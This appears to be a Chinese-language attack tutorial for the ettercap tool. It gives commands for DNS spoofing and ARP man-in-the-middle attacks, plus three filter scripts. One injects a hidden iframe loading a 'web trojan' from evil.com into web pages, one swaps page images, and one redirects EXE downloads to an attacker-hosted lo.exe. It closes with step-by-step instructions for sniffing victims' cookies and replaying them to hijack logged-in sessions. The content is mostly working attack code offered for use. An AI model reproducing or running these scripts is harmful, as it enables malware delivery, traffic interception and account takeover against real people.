ettercap
1,dns_spoof:
ettercap -T -q -P dns_spoof -M arp:remote /target ip/ //
使用前在dns文件(bt5r2中在/usr/local/share/ettercap中)中添加要欺骗的记录
结合metasploit或者set进行dns_spoof攻击
2,arp_spoof:
过滤脚本1:
if(ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data,"Accept-Encoding")) {
replace("Accept-Encoding","Accept-Mousecat");
msg("zapped Accept-Encoding!
");
}
}
if (ip.proto == TCP && tcp.src == 80) {
if (search(DATA.data, "<body>") ){
#插入网马地址
replace("<body>","<body> <iframe src="http://evil.com/evil.html"width=0 height=0 >");
msg("Filter Run...&&Exploit Code Injected OK!
");
}
}
ettercap -o ieexpft ieexpft.filter
ettercap -T -q -F ieexpft -M arp:remote /target ip/ //
同样可结合metasploit/set来实施欺骗攻击
过滤脚本2:
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("zapped Accept-Encoding!n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=http://www.2cto.com/uploadfile/2012/0508/20120508011856683.jpeg" ");
replace("IMG SRC=", "img src=http://www.2cto.com/uploadfile/2012/0508/20120508011856683.jpeg" ");
msg("Filter Ran.n");
}
修改图片为自己的网马地址
过滤脚本3:
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("zapped Accept-Encoding!n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("keep-alive", "close" ");
replace("Keep-Alive", "close" ");
}
if (ip.proto == TCP && search(DATA.data, ": application") ){
msg("found EXE");
if (search(DATA.data, "Win32")) {
msg("doing nothing");
} else {
replace("200 OK", "301 Moved Permanently
Location: http://192.168.108.1/lo.exe
");
msg("redirect success");
}
}
替换下载的exe文件为自己的网马
3,ettercap gtk的使用,窃取cookie
在shell下输入 ettercap -G 即可打开GTK模式
这里讲解使用它的中间人攻击
首先打开/etc/etter.conf。找到redir_command_on那一段,你会看到他已经写好了Mac OS和Linux版本的命令。Linux下面又分开了ipchains和iptables两个。根据你自己使用的OS和软件,将相应的命令uncomment掉。我使用的是Linux和iptables,所以将那两句前面的#号去掉就可以。
然后在shell 下输入 echo "1">/proc/sys/net/ipv4/ip_forward 启用IP转发功能,如果不打开这个功能待会攻击的时候会导致对方不能上网。
有时候网卡预设的MTU可能过小,导致之后不能成功转发目标与网关的IP包。所以最好将MTU改成1500以上,在命令行输入“ifconfig eth0 mtu 1500”。将eth0改成你的网卡。
打开ettercap。选择“Unifed Sniffing”,输入自己的网卡,我这里是eth0
扫描网络上的主机。选择“Scan for Hosts”,之后打开“Host list”。将网关加到target 1,目标机器加到target 2。
选择“Start Sniffing”
~此时可以打开wireshark监听网卡,这里是eth0,如果wireshark不能识别网卡,就用tcpdump监听网卡然后-w保存数据包,用wireshark打开,获取的数据包中有对方的cookie
~也可以选择“MITM attack” –> “Arp poison”,开始MITM攻击。
之后stop sniffering
用arpspoof可以实现同样的效果
arpspoof -i eth0 -t 目标IP 网关IP
之后用wireshark监听或者tcpdump监听wireshark分析都可得到cookie
利用cookie ,在firefox安装greasemonkey工具,并打开https://userscripts.org/scripts/show/119798安装cookie injector 重启浏览器,打开窃取到cookie的对应网页,ctrl+c呼出cookie injector输入窃取到的
cookie,点OK,然后刷新页面就可以看到您已经是登陆用户了。^_^